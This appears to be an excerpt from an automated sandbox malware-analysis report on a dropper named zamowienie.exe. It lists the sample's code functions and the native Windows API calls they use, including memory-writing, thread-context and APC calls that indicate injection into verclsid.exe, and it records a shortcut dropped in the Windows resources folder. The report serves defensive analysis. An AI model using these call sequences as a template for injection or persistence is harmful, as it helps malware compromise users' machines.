    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00405640 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405640
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F335C0 NtCreateMutant,LdrInitializeThunk,3_2_34F335C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_34F32C70
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_34F32DF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F33090 NtSetValueKey,3_2_34F33090
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F33010 NtOpenDirectoryObject,3_2_34F33010
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F33D70 NtOpenThread,3_2_34F33D70
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F33D10 NtOpenProcessToken,3_2_34F33D10
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F339B0 NtGetContextThread,3_2_34F339B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F34650 NtSuspendThread,3_2_34F34650
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F34340 NtSetContextThread,3_2_34F34340
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32CF0 NtOpenProcess,3_2_34F32CF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32CC0 NtQueryVirtualMemory,3_2_34F32CC0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32CA0 NtQueryInformationToken,3_2_34F32CA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32C60 NtCreateKey,3_2_34F32C60
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32C00 NtQueryInformationProcess,3_2_34F32C00
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32DD0 NtDelayExecution,3_2_34F32DD0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32DB0 NtEnumerateKey,3_2_34F32DB0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32D30 NtUnmapViewOfSection,3_2_34F32D30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32D10 NtMapViewOfSection,3_2_34F32D10
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32D00 NtSetInformationFile,3_2_34F32D00
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32EE0 NtQueueApcThread,3_2_34F32EE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32EA0 NtAdjustPrivilegesToken,3_2_34F32EA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32E80 NtReadVirtualMemory,3_2_34F32E80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32E30 NtWriteVirtualMemory,3_2_34F32E30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32FE0 NtCreateFile,3_2_34F32FE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32FB0 NtResumeThread,3_2_34F32FB0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32FA0 NtQuerySection,3_2_34F32FA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32F90 NtProtectVirtualMemory,3_2_34F32F90
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32F60 NtCreateProcessEx,3_2_34F32F60
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32F30 NtCreateSection,3_2_34F32F30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32AF0 NtWriteFile,3_2_34F32AF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32AD0 NtReadFile,3_2_34F32AD0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32AB0 NtWaitForSingleObject,3_2_34F32AB0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32BF0 NtAllocateVirtualMemory,3_2_34F32BF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32BE0 NtQueryValueKey,3_2_34F32BE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32BA0 NtEnumerateValueKey,3_2_34F32BA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32B80 NtQueryInformationFile,3_2_34F32B80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32B60 NtClose,3_2_34F32B60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF4650 NtSuspendThread,LdrInitializeThunk,7_2_04EF4650
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF4340 NtSetContextThread,LdrInitializeThunk,7_2_04EF4340
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04EF2CA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2C60 NtCreateKey,LdrInitializeThunk,7_2_04EF2C60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04EF2C70
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04EF2DF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2DD0 NtDelayExecution,LdrInitializeThunk,7_2_04EF2DD0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04EF2D30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04EF2D10
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04EF2EE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04EF2E80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2FE0 NtCreateFile,LdrInitializeThunk,7_2_04EF2FE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2FB0 NtResumeThread,LdrInitializeThunk,7_2_04EF2FB0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2F30 NtCreateSection,LdrInitializeThunk,7_2_04EF2F30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2AF0 NtWriteFile,LdrInitializeThunk,7_2_04EF2AF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2AD0 NtReadFile,LdrInitializeThunk,7_2_04EF2AD0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04EF2BE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04EF2BF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04EF2BA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2B60 NtClose,LdrInitializeThunk,7_2_04EF2B60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF35C0 NtCreateMutant,LdrInitializeThunk,7_2_04EF35C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF39B0 NtGetContextThread,LdrInitializeThunk,7_2_04EF39B0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2CF0 NtOpenProcess,7_2_04EF2CF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2CC0 NtQueryVirtualMemory,7_2_04EF2CC0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2C00 NtQueryInformationProcess,7_2_04EF2C00
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2DB0 NtEnumerateKey,7_2_04EF2DB0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2D00 NtSetInformationFile,7_2_04EF2D00
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2EA0 NtAdjustPrivilegesToken,7_2_04EF2EA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2E30 NtWriteVirtualMemory,7_2_04EF2E30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2FA0 NtQuerySection,7_2_04EF2FA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2F90 NtProtectVirtualMemory,7_2_04EF2F90
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2F60 NtCreateProcessEx,7_2_04EF2F60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2AB0 NtWaitForSingleObject,7_2_04EF2AB0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2B80 NtQueryInformationFile,7_2_04EF2B80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF3090 NtSetValueKey,7_2_04EF3090
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF3010 NtOpenDirectoryObject,7_2_04EF3010
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF3D70 NtOpenThread,7_2_04EF3D70
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF3D10 NtOpenProcessToken,7_2_04EF3D10
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC8F80 NtCreateFile,7_2_02EC8F80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC9290 NtClose,7_2_02EC9290
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC93F0 NtAllocateVirtualMemory,7_2_02EC93F0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC90F0 NtReadFile,7_2_02EC90F0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC91F0 NtDeleteFile,7_2_02EC91F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034F1
    Source: C:\Users\user\Desktop\zamowienie.exeFile created: C:\Windows\resources\synderegistres.lnkJump to behavior
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00406ADA0_2_00406ADA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_73401B280_2_73401B28
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF14603_2_34EF1460
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBF43F3_2_34FBF43F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC95C33_2_34FC95C3
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9D5B03_2_34F9D5B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB75713_2_34FB7571
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB16CC3_2_34FB16CC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F456303_2_34F45630
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBF7B03_2_34FBF7B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB70E93_2_34FB70E9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBF0E03_2_34FBF0E0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C03_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF0CC3_2_34FAF0CC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0B1B03_2_34F0B1B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB16B3_2_34FCB16B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF1723_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F3516C3_2_34F3516C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C03_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A03_2_34F052A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F4739A3_2_34F4739A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EED34C3_2_34EED34C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB132D3_2_34FB132D
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBFCF23_2_34FBFCF2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F79C323_2_34F79C32
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1FDC03_2_34F1FDC0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB7D733_2_34FB7D73
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB1D5A3_2_34FB1D5A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F03D403_2_34F03D40
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F09EB03_2_34F09EB0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EC3FD53_2_34EC3FD5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EC3FD23_2_34EC3FD2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBFFB13_2_34FBFFB1
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01F923_2_34F01F92
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBFF093_2_34FBFF09
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F038E03_2_34F038E0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D8003_2_34F6D800
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F099503_2_34F09950
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B9503_2_34F1B950
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F959103_2_34F95910
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FADAC63_2_34FADAC6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F45AA03_2_34F45AA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9DAAC3_2_34F9DAAC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA1AA33_2_34FA1AA3
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F73A6C3_2_34F73A6C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBFA493_2_34FBFA49
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB7A463_2_34FB7A46
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F75BF03_2_34F75BF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F3DBF93_2_34F3DBF9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1FB803_2_34F1FB80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBFB763_2_34FBFB76
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAE4F63_2_34FAE4F6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB24463_2_34FB2446
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA44203_2_34FA4420
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC05913_2_34FC0591
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F005353_2_34F00535
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1C6E03_2_34F1C6E0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFC7C03_2_34EFC7C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F007703_2_34F00770
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F247503_2_34F24750
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F920003_2_34F92000
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB81CC3_2_34FB81CC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC01AA3_2_34FC01AA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB41A23_2_34FB41A2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F881583_2_34F88158
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9A1183_2_34F9A118
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF01003_2_34EF0100
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F802C03_2_34F802C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA02743_2_34FA0274
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0E3F03_2_34F0E3F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC03E63_2_34FC03E6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBA3523_2_34FBA352
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF0CF23_2_34EF0CF2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA0CB53_2_34FA0CB5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F00C003_2_34F00C00
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFADE03_2_34EFADE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F18DBF3_2_34F18DBF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9CD1F3_2_34F9CD1F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0AD003_2_34F0AD00
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBEEDB3_2_34FBEEDB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F12E903_2_34F12E90
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBCE933_2_34FBCE93
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F00E593_2_34F00E59
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBEE263_2_34FBEE26
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0CFE03_2_34F0CFE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF2FC83_2_34EF2FC8
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7EFA03_2_34F7EFA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F74F403_2_34F74F40
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F20F303_2_34F20F30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA2F303_2_34FA2F30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F42F283_2_34F42F28
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2E8F03_2_34F2E8F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE68B83_2_34EE68B8
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0A8403_2_34F0A840
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F028403_2_34F02840
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F029A03_2_34F029A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCA9A63_2_34FCA9A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F169623_2_34F16962
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFEA803_2_34EFEA80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB6BD73_2_34FB6BD7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBAB403_2_34FBAB40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F6E4F67_2_04F6E4F6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F724467_2_04F72446
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F644207_2_04F64420
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F805917_2_04F80591
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC05357_2_04EC0535
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDC6E07_2_04EDC6E0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EBC7C07_2_04EBC7C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC07707_2_04EC0770
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EE47507_2_04EE4750
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F520007_2_04F52000
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F781CC7_2_04F781CC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F801AA7_2_04F801AA
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F741A27_2_04F741A2
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F481587_2_04F48158
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB01007_2_04EB0100
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F5A1187_2_04F5A118
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F402C07_2_04F402C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F602747_2_04F60274
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECE3F07_2_04ECE3F0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F803E67_2_04F803E6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7A3527_2_04F7A352
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB0CF27_2_04EB0CF2
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F60CB57_2_04F60CB5
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC0C007_2_04EC0C00
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EBADE07_2_04EBADE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ED8DBF7_2_04ED8DBF
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F5CD1F7_2_04F5CD1F
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECAD007_2_04ECAD00
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7EEDB7_2_04F7EEDB
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7CE937_2_04F7CE93
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ED2E907_2_04ED2E90
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC0E597_2_04EC0E59
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7EE267_2_04F7EE26
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECCFE07_2_04ECCFE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB2FC87_2_04EB2FC8
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F3EFA07_2_04F3EFA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F34F407_2_04F34F40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F62F307_2_04F62F30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F02F287_2_04F02F28
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EE0F307_2_04EE0F30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EEE8F07_2_04EEE8F0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EA68B87_2_04EA68B8
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECA8407_2_04ECA840
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC28407_2_04EC2840
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC29A07_2_04EC29A0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F8A9A67_2_04F8A9A6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ED69627_2_04ED6962
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EBEA807_2_04EBEA80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F76BD77_2_04F76BD7
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7AB407_2_04F7AB40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB14607_2_04EB1460
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7F43F7_2_04F7F43F
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F895C37_2_04F895C3
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F5D5B07_2_04F5D5B0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F775717_2_04F77571
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F716CC7_2_04F716CC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F056307_2_04F05630
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7F7B07_2_04F7F7B0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7F0E07_2_04F7F0E0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F770E97_2_04F770E9
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC70C07_2_04EC70C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F6F0CC7_2_04F6F0CC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECB1B07_2_04ECB1B0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF516C7_2_04EF516C
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F8B16B7_2_04F8B16B
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EAF1727_2_04EAF172
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F612ED7_2_04F612ED
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDB2C07_2_04EDB2C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC52A07_2_04EC52A0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F0739A7_2_04F0739A
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EAD34C7_2_04EAD34C
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7132D7_2_04F7132D
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FCF27_2_04F7FCF2
